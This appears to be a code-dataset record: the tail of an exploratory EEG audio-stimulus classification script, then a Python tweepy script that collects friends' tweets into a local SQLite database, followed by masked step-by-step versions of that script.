"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 7 03:41:18 2020\n\n@author: owlthekasra\n\"\"\"\n\nimport methods as md\nimport add_label as al\nimport numpy as np\nimport pandas as pd\nimport random\n\nsb_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_2'\nsb_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/trials_3'\nsb_rd_3 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass/extra_deleted_metadata'\nns_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_1'\nns_rd_2 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/no_sound/trials_2'\nsbt_rd_1 = '/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/sine_bass_thought/trials_1'\n\ndf_sine_bass_trials = al.get_long_dataframe(sb_rd_1).append(al.get_long_dataframe(sb_rd_2))\ndf_no_sound_trials = al.get_long_dataframe(ns_rd_1).append(al.get_long_dataframe(ns_rd_2))\ndf_sine_bass_thought_trials = al.get_long_dataframe(sbt_rd_1)\n\n# _, df_sine_bass_extra = al.get_all_dataframes(sb_rd_3, 1)\n# _, df_sine_bass_trials_2 = al.get_all_dataframes(sb_rd_1, 1)\n# _, df_sine_bass_trials_3 = al.get_all_dataframes(sb_rd_2, 1)\n# _, df_no_sound_trials_1 = al.get_all_dataframes(ns_rd_1, 0)\n# _, df_no_sound_trials_2 = al.get_all_dataframes(ns_rd_2, 0)\n# _, df_sine_bass_thought_trials_1 = al.get_all_dataframes(sbt_rd_1, 2)\n\n# diff_labels = [df_sine_bass_thought_trials_1, df_sine_bass_extra, df_sine_bass_trials_2, df_sine_bass_trials_3, df_no_sound_trials_1, df_no_sound_trials_2]\n# big_frame = pd.concat(diff_labels, ignore_index=True)\n# bg = big_frame.iloc[:, :513]\n\n# sound = bg[bg[\"label\"]==1].iloc[:,1:]\n# nosound = bg[bg[\"label\"]==0].iloc[:,1:]\n# imagesound = bg[bg[\"label\"]==2].iloc[:,1:]\n\n\n\n\n\ndef get_X_and_y(df, start=1):\n y = df[['label']]\n X = df[:, start:]\n return (X, y)\n\ndef subtract_moving_average(df, n=50):\n k = n\n bgnorm = pd.DataFrame(np.zeros((len(df), len(df.columns))))\n for j in range(0, len(df)):\n for i in range(0, len(df.columns)):\n #define indices\n indices = range(max(1, i-k), min(i+k, len(df.columns)));\n avg = df.iloc[j, :]\n avg = avg.iloc[indices].mean()\n newnum = df.iloc[j, i] - avg\n print(newnum)\n bgnorm.iloc[j, i] = newnum\n return bgnorm\n\n# #preprocess thought sine wave only\n# y_values_thought = df_sine_bass_thought_trials_1.iloc[:, 0]\n# X_values_thought = df_sine_bass_thought_trials_1.iloc[:, 132:660]\n# df_thought = pd.concat([y_values_thought, X_values_thought], axis=1, ignore_index=True)\n\n\nsnd = pd.DataFrame()\n# sn2 = sound.reset_index().iloc[:,1:].T\nfor i in range(0, int(len(sound)/4)):\n snd = pd.concat([snd, sound.iloc[i*4:i*4+4, :]], axis = 1)\n\n#separate channels into different dataframes\nbg1 = bg.iloc[::4, :]\nbg2 = bg.iloc[1::4, :]\nbg3 = bg.iloc[2::4, :]\nbg4 = bg.iloc[3::4, :]\n\nbigX = bg.iloc[:, 1:]\nbigy = bg.iloc[:,0]\n\n\n#subtracting average of each row\nbigX = lab.iloc[:, 1:]\nlen(bigX.columns)\nlen(bigX)\nbgnorm = subtract_moving_average(bigX)\n\n\nbgnormlab = pd.concat([bigy, bgnorm], axis=1)\n\nbgnormlab.to_csv('bgnormalized3600x517.csv')\n\nbgnormlab = pd.read_csv('/Users/owlthekasra/Documents/Code/Python/AudioStimulus/data/csv/bgnormalized3600x517.csv')\n\nj3 = pd.DataFrame()\ndef get_mean_down_df(df, nchan=4 ):\n avg_df = pd.DataFrame()\n for i in range(1, len(df)+1):\n if ((i % nchan) == 0):\n j5 = range(i-nchan,i)\n j1 = df.iloc[j5, :]\n k1 = j1.mean()\n avg_df = avg_df.append(k1, 
ignore_index=True)\n return avg_df\n\nj5 = range(0,8)\nj1 = bigX.iloc[j5, :]\n \nbgnormavg = get_mean_down_df(bgnormlab)\nlab = bgnormavg.iloc[:,-1]\nlab = lab.append(bgnormavg.iloc[:,:-1])\n\n\nindices = range(397, 417)\nj1 = lab.iloc[1, :].iloc[1:]\nj2 = j1.iloc[indices]\nj3 = j2.mean()\n\nrandom.seed(100)\n# bssss = bgnormavg.drop(columns=['Unnamed: 0'])\nmain = bg1.sample(frac=1)\nmain = main.reset_index()\nmain = main.iloc[:, 1:]\n\ntrain = main.iloc[:650]\nval = main.iloc[650:]\n\n# main2 = main.sample(frac=1)\n\nX_train = main.iloc[:, 1:]\ny_train = main['label']\nX_val = val.iloc[:, 1:]\ny_val = val['label']\n\nmodel, acc, pred, y_test = md.fitPredictValSet(X_train, y_train, X_val, y_val, 'tree')\n\nprint(indices)",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
#!/home/nick/.virtualenvs/twitterbots/bin/python3.5
# -*- coding: utf-8 -*-
import tweepy
import sqlite3
from configparser import ConfigParser
'''
A little OOP would be good later for
authenticated user data, c, conn, api
'''
def main():
Collector.collect()
class Collector:
# Main function
def collect():
api = Collector.get_api()
tweet_dump = Collector.all_tweet_db()
c = tweet_dump[0]
conn = tweet_dump[1]
last_list = Collector.last_tweets(c, conn)
# Look for new friends, add to db
new_friends = Collector.new_f_check(api, c)
Collector.download_to_limit(api, c, conn, new_friends)
# Checks timelines of everyone in db already
# adds anything new to db
Collector.download_recent(api, c, conn, last_list)
def get_api():
parser = ConfigParser()
parser.read('twitter_auth.ini')
consumer_key = parser.get('Keys',
'consumer_key').strip("'")
consumer_secret = parser.get('Secrets',
'consumer_secret').strip("'")
access_token = parser.get('Tokens',
'access_token').strip("'")
access_token_secret = parser.get('Secrets',
'access_token_secret').strip("'")
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth, wait_on_rate_limit=True)
return api
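
    # Assumed layout of twitter_auth.ini (hypothetical, inferred from the
    # parser.get() calls above -- match it to your actual file):
    #
    #   [Keys]
    #   consumer_key = '...'
    #   [Tokens]
    #   access_token = '...'
    #   [Secrets]
    #   consumer_secret = '...'
    #   access_token_secret = '...'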
# connects to tweet_dump.db creates tdump if not exists
# tdump stores all tweets from anyone in list
def all_tweet_db():
conn = sqlite3.connect('tweet_dump_main.db')
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS tdump
(tweet TEXT,
username TEXT,
tweet_date TEXT,
tweet_id TEXT,
tweet_source TEXT,
user_id TEXT)''')
return c, conn
    # connects to tweet_dump.db, creates `mentioned` if not exists
    # `mentioned` stores tweets that mention the authenticated user
def mention_tweet_db():
conn = sqlite3.connect('tweet_dump_main.db')
c = conn.cursor()
c.execute('''CREATE TABLE IF NOT EXISTS mentioned
(tweet TEXT,
username TEXT,
tweet_date TEXT,
tweet_id TEXT,
tweet_source TEXT,
user_id TEXT)''')
return c, conn
# looks for new friends by comparing authenticated
# user's friend list with list of friends in tdump
def new_f_check(api, c):
# get list of user's ids
c.execute('SELECT user_id FROM tdump')
users = c.fetchall()
users = list(set([user[0] for user in users]))
# get list of friends_ids from twitter
friends_ids = api.friends_ids()
new_friends = [x for x in friends_ids if str(x) not in users]
return new_friends
# downloads up to 3200 of a user's most
# recent tweets commits to tdump
def download_to_limit(api, c, conn, friend_list):
# List of tweet ids already in db
c.execute('SELECT tweet_id FROM tdump')
tweet_ids = c.fetchall()
tweet_ids = [e[0] for e in tweet_ids]
new_tweets = []
for friend in friend_list:
try:
# try to get most recent 200 tweets from friend
get_tweets = api.user_timeline(id=friend, count=200)
            except Exception as e:
                continue
            if not get_tweets:  # friend with an empty timeline
                continue
            # add to list of all of this friend's tweets
            new_tweets.extend(get_tweets)
            # find oldest retrieved tweet's id number less 1
            oldest = get_tweets[-1].id - 1
# get tweets until 3200 limit hit
while len(get_tweets) > 0:
try:
# max_id arg looks for id's less than arg's value
get_tweets = api.user_timeline(id=friend,
count=200,
max_id=oldest)
                except Exception as e:
                    break  # a bare `continue` can spin forever if the call keeps failing
new_tweets.extend(get_tweets)
oldest = new_tweets[-1].id - 1
if len(new_tweets) != 0:
print('Insert Active')
for tweet in new_tweets:
c.execute('''INSERT INTO tdump
(tweet,
username,
tweet_date,
tweet_id,
tweet_source,
user_id)
VALUES(?,?,?,?,?,?)''',
[tweet.text,
tweet.user.screen_name,
tweet.created_at,
tweet.id_str,
tweet.source,
tweet.user.id_str])
conn.commit()
if len(new_tweets) != 0:
print('Insert Done' + '\n')
# simply check if tweet text contains my screen name
# change from hard code later
def mention_me(new_tweet_list, c, conn):
        # the insert loop below reads status attributes (tweet.text, ...),
        # so filter on .text as well; the original's x[0] assumed tuples
        mentioned = [x for x in new_tweet_list if '@BonneNick' in x.text]
        if len(mentioned) != 0:
            print('Insert Active')
        for tweet in mentioned:
            # mention_tweet_db() creates `mentioned`, so insert there
            # (the original targeted a nonexistent `served` table)
            c.execute('''INSERT INTO mentioned
(tweet,
username,
tweet_date,
tweet_id,
tweet_source,
user_id)
VALUES(?,?,?,?,?,?)''',
[tweet.text,
tweet.user.screen_name,
tweet.created_at,
tweet.id_str,
tweet.source,
tweet.user.id_str])
conn.commit()
        if len(mentioned) != 0:
print('Insert Done' + '\n')
    # returns list of (user_id, tweet_id) pairs, where tweet_id
    # belongs to that user's most recent tweet in the database
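    # illustrative shape of the result (made-up ids): [('12345', '98765'), ...]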
def last_tweets(c, conn):
# list of user ids and the date of the
# last tweet in db
user_last_tweets = []
# get list of user's ids
c.execute('SELECT user_id FROM tdump')
users = c.fetchall()
users = list(set([user[0] for user in users]))
for user in users:
c.execute('''SELECT user_id, tweet_id
FROM tdump
WHERE user_id = ?
ORDER BY tweet_date DESC''',
[user])
last_tweet = c.fetchone()
user_last_tweets.append(last_tweet)
return user_last_tweets
    # downloads most recent posts in each user's timeline
def download_recent(api, c, conn, last_tweets):
c.execute('SELECT tweet_id FROM tdump')
tweet_ids = [x[0] for x in c.fetchall()]
new_tweets = []
for pair in last_tweets:
user_id = pair[0]
tweet_id = pair[1]
try:
get_tweets = api.user_timeline(id=user_id,
since_id=tweet_id,
count=200)
except Exception:
continue
if len(get_tweets) != 0:
# add to list of all of this friend's tweets
new_tweets.extend(get_tweets)
# find newest retrieved tweet's id number plus 1
newest = get_tweets[0].id + 1
while len(get_tweets) > 0:
try:
                    # since_id arg looks for id's greater than arg's value
get_tweets = api.user_timeline(id=user_id,
count=200,
since_id=newest)
new_tweets.extend(get_tweets)
newest = get_tweets[0].id + 1
                except Exception:
                    break  # avoid spinning forever if the call keeps failing
if len(new_tweets) != 0:
print('Insert Active')
for tweet in new_tweets:
            if tweet.user.screen_name != 'BonneNick' \
               and tweet.id_str not in tweet_ids:  # ids are stored as TEXT in the db
c.execute('''INSERT INTO tdump
(tweet,
username,
tweet_date,
tweet_id,
tweet_source,
user_id)
VALUES(?,?,?,?,?,?)''',
[tweet.text,
tweet.user.screen_name,
tweet.created_at,
tweet.id_str,
tweet.source,
tweet.user.id_str])
        # commit once after the loop; closing inside it would drop the
        # connection after the first insert
        conn.commit()
        conn.close()
if len(new_tweets) != 0:
print('Insert Done' + '\n')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "372d8c8cb9ec8f579db8588aff7799c73c5af255",
"index": 519,
"step-1": "<mask token>\n\n\nclass Collector:\n <mask token>\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n <mask token>\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n <mask token>\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n <mask token>\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Collector:\n <mask token>\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n\n def all_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def new_f_check(api, c):\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n friends_ids = api.friends_ids()\n new_friends = [x for x in friends_ids if str(x) not in users]\n return new_friends\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n def mention_me(new_tweet_list, c, conn):\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n if len(new_tweet_list) != 0:\n print('Insert Active')\n for tweet in mentioned:\n c.execute(\n \"\"\"INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweet_list) != 0:\n print('Insert Done' + '\\n')\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n\n def download_recent(api, c, conn, last_tweets):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n new_tweets = []\n for pair in last_tweets:\n user_id = pair[0]\n 
tweet_id = pair[1]\n try:\n get_tweets = api.user_timeline(id=user_id, since_id=\n tweet_id, count=200)\n except Exception:\n continue\n if len(get_tweets) != 0:\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=user_id, count=\n 200, since_id=newest)\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n except Exception:\n continue\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n if (tweet.user.screen_name != 'BonneNick' and tweet.id not in\n tweet_ids):\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n conn.close()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n Collector.collect()\n\n\nclass Collector:\n\n def collect():\n api = Collector.get_api()\n tweet_dump = Collector.all_tweet_db()\n c = tweet_dump[0]\n conn = tweet_dump[1]\n last_list = Collector.last_tweets(c, conn)\n new_friends = Collector.new_f_check(api, c)\n Collector.download_to_limit(api, c, conn, new_friends)\n Collector.download_recent(api, c, conn, last_list)\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n\n def all_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def new_f_check(api, c):\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n friends_ids = api.friends_ids()\n new_friends = [x for x in friends_ids if str(x) not in users]\n return new_friends\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n def mention_me(new_tweet_list, c, conn):\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n if len(new_tweet_list) != 0:\n print('Insert Active')\n for tweet in mentioned:\n c.execute(\n \"\"\"INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweet_list) != 0:\n print('Insert Done' + '\\n')\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE 
user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n\n def download_recent(api, c, conn, last_tweets):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n new_tweets = []\n for pair in last_tweets:\n user_id = pair[0]\n tweet_id = pair[1]\n try:\n get_tweets = api.user_timeline(id=user_id, since_id=\n tweet_id, count=200)\n except Exception:\n continue\n if len(get_tweets) != 0:\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=user_id, count=\n 200, since_id=newest)\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n except Exception:\n continue\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n if (tweet.user.screen_name != 'BonneNick' and tweet.id not in\n tweet_ids):\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n conn.close()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\ndef main():\n Collector.collect()\n\n\nclass Collector:\n\n def collect():\n api = Collector.get_api()\n tweet_dump = Collector.all_tweet_db()\n c = tweet_dump[0]\n conn = tweet_dump[1]\n last_list = Collector.last_tweets(c, conn)\n new_friends = Collector.new_f_check(api, c)\n Collector.download_to_limit(api, c, conn, new_friends)\n Collector.download_recent(api, c, conn, last_list)\n\n def get_api():\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys', 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets', 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens', 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets', 'access_token_secret'\n ).strip(\"'\")\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_token_secret)\n api = tweepy.API(auth, wait_on_rate_limit=True)\n return api\n\n def all_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS tdump\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def mention_tweet_db():\n conn = sqlite3.connect('tweet_dump_main.db')\n c = conn.cursor()\n c.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS mentioned\n (tweet TEXT,\n username TEXT,\n tweet_date TEXT,\n tweet_id TEXT,\n tweet_source TEXT,\n user_id TEXT)\"\"\"\n )\n return c, conn\n\n def new_f_check(api, c):\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n friends_ids = api.friends_ids()\n new_friends = [x for x in friends_ids if str(x) not in users]\n return new_friends\n\n def download_to_limit(api, c, conn, friend_list):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = c.fetchall()\n tweet_ids = [e[0] for e in tweet_ids]\n new_tweets = []\n for friend in friend_list:\n try:\n get_tweets = api.user_timeline(id=friend, count=200)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=friend, count=200,\n max_id=oldest)\n except Exception as e:\n continue\n new_tweets.extend(get_tweets)\n oldest = new_tweets[-1].id - 1\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n def mention_me(new_tweet_list, c, conn):\n mentioned = [x for x in new_tweet_list if '@BonneNick' in x[0]]\n if len(new_tweet_list) != 0:\n print('Insert Active')\n for tweet in mentioned:\n c.execute(\n \"\"\"INSERT INTO served\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n if len(new_tweet_list) != 0:\n print('Insert Done' + '\\n')\n\n def last_tweets(c, conn):\n user_last_tweets = []\n c.execute('SELECT user_id FROM tdump')\n users = c.fetchall()\n users = list(set([user[0] for user in users]))\n for user in users:\n c.execute(\n \"\"\"SELECT user_id, tweet_id\n FROM tdump\n WHERE 
user_id = ?\n ORDER BY tweet_date DESC\"\"\"\n , [user])\n last_tweet = c.fetchone()\n user_last_tweets.append(last_tweet)\n return user_last_tweets\n\n def download_recent(api, c, conn, last_tweets):\n c.execute('SELECT tweet_id FROM tdump')\n tweet_ids = [x[0] for x in c.fetchall()]\n new_tweets = []\n for pair in last_tweets:\n user_id = pair[0]\n tweet_id = pair[1]\n try:\n get_tweets = api.user_timeline(id=user_id, since_id=\n tweet_id, count=200)\n except Exception:\n continue\n if len(get_tweets) != 0:\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n while len(get_tweets) > 0:\n try:\n get_tweets = api.user_timeline(id=user_id, count=\n 200, since_id=newest)\n new_tweets.extend(get_tweets)\n newest = get_tweets[0].id + 1\n except Exception:\n continue\n if len(new_tweets) != 0:\n print('Insert Active')\n for tweet in new_tweets:\n if (tweet.user.screen_name != 'BonneNick' and tweet.id not in\n tweet_ids):\n c.execute(\n \"\"\"INSERT INTO tdump\n (tweet,\n username,\n tweet_date,\n tweet_id,\n tweet_source,\n user_id)\n VALUES(?,?,?,?,?,?)\"\"\"\n , [tweet.text, tweet.user.screen_name, tweet.created_at,\n tweet.id_str, tweet.source, tweet.user.id_str])\n conn.commit()\n conn.close()\n if len(new_tweets) != 0:\n print('Insert Done' + '\\n')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/home/nick/.virtualenvs/twitterbots/bin/python3.5\n# -*- coding: utf-8 -*-\n\nimport tweepy\nimport sqlite3\n\nfrom configparser import ConfigParser\n\n'''\nA little OOP would be good later for\nauthenticated user data, c, conn, api\n'''\n\n\ndef main():\n\n Collector.collect()\n\n\nclass Collector:\n\n # Main function\n def collect():\n\n api = Collector.get_api()\n\n tweet_dump = Collector.all_tweet_db()\n c = tweet_dump[0]\n conn = tweet_dump[1]\n last_list = Collector.last_tweets(c, conn)\n\n # Look for new friends, add to db\n new_friends = Collector.new_f_check(api, c)\n\n Collector.download_to_limit(api, c, conn, new_friends)\n\n # Checks timelines of everyone in db already\n # adds anything new to db\n Collector.download_recent(api, c, conn, last_list)\n\n def get_api():\n\n parser = ConfigParser()\n parser.read('twitter_auth.ini')\n consumer_key = parser.get('Keys',\n 'consumer_key').strip(\"'\")\n consumer_secret = parser.get('Secrets',\n 'consumer_secret').strip(\"'\")\n access_token = parser.get('Tokens',\n 'access_token').strip(\"'\")\n access_token_secret = parser.get('Secrets',\n 'access_token_secret').strip(\"'\")\n\n auth = tweepy.OAuthHandler(consumer_key, 